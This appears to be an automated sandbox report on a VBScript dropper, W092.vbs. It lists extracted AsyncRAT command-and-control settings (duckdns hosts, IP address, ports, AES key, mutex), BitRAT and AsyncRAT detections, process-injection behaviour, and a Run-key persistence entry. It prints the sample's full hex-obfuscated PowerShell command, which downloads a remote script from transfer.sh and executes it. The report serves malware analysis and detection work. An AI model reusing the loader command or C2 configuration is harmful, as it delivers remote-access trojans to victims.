Analysis
-
max time kernel
150s -
max time network
185s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
14/08/2021, 06:40
Static task
static1
Behavioral task
behavioral1
Sample
W092.vbs
Resource
win7v20210408
General
-
Target
W092.vbs
-
Size
1KB
-
MD5
eaecbd393f2fffd8522e5d4c7b8b6f7d
-
SHA1
6a9ac84f1c4778cf41ef45b2906919f99a06acf5
-
SHA256
414a79e6c87489cb73e9176e867d554788a28ba86cb4e00f3f8fed15400999bd
-
SHA512
8c24cf0f221c9de102adbfc21f3f762a06b4041963534021ffa7ba4174e149577adb00425066157c9257c3a0f407490754bf58090f8da9096cbe8970b57a42ae
Malware Config
Extracted
http://transfer.sh/1T8qkDx/ko.txt
Extracted
asyncrat
0.5.7B
asyncpc.duckdns.org:6650
asyncpc.duckdns.org:9034
asyncpc.duckdns.org:6890
asyncpc.duckdns.org:7829
13.77.222.211:6650
13.77.222.211:9034
13.77.222.211:6890
13.77.222.211:7829
AsyncMutex_6SI8OkPnk
-
aes_key
PYYzntkVFJfMofAe4qQYi6HmHf8Kj3BT
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
asyncpc.duckdns.org,13.77.222.211
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6650,9034,6890,7829
-
version
0.5.7B
Signatures
-
BitRAT Payload 2 IoCs
resource yara_rule behavioral1/memory/1548-98-0x00000000007E2740-mapping.dmp family_bitrat behavioral1/memory/1548-101-0x0000000000400000-0x00000000007E4000-memory.dmp family_bitrat -
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/memory/936-90-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/936-91-0x000000000040D11E-mapping.dmp asyncrat behavioral1/memory/936-92-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 1376 powershell.exe -
resource yara_rule behavioral1/memory/1548-97-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1548-101-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google = "C:\\Users\\Admin\\AppData\\Local\\Appdata\\Google.exe" aspnet_regbrowsers.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1548 aspnet_regbrowsers.exe 1548 aspnet_regbrowsers.exe 1548 aspnet_regbrowsers.exe 1548 aspnet_regbrowsers.exe 1548 aspnet_regbrowsers.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1376 set thread context of 936 1376 powershell.exe 31 PID 1376 set thread context of 1548 1376 powershell.exe 33 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1376 powershell.exe 1376 powershell.exe 1376 powershell.exe 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 936 aspnet_regbrowsers.exe Token: SeDebugPrivilege 1548 aspnet_regbrowsers.exe Token: SeShutdownPrivilege 1548 aspnet_regbrowsers.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1548 aspnet_regbrowsers.exe 1548 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1840 wrote to memory of 1376 1840 WScript.exe 29 PID 1840 wrote to memory of 1376 1840 WScript.exe 29 PID 1840 wrote to memory of 1376 1840 WScript.exe 29 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 936 1376 powershell.exe 31 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33 PID 1376 wrote to memory of 1548 1376 powershell.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\W092.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transfer.sh/1T8qkDx/ko.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1548
-
-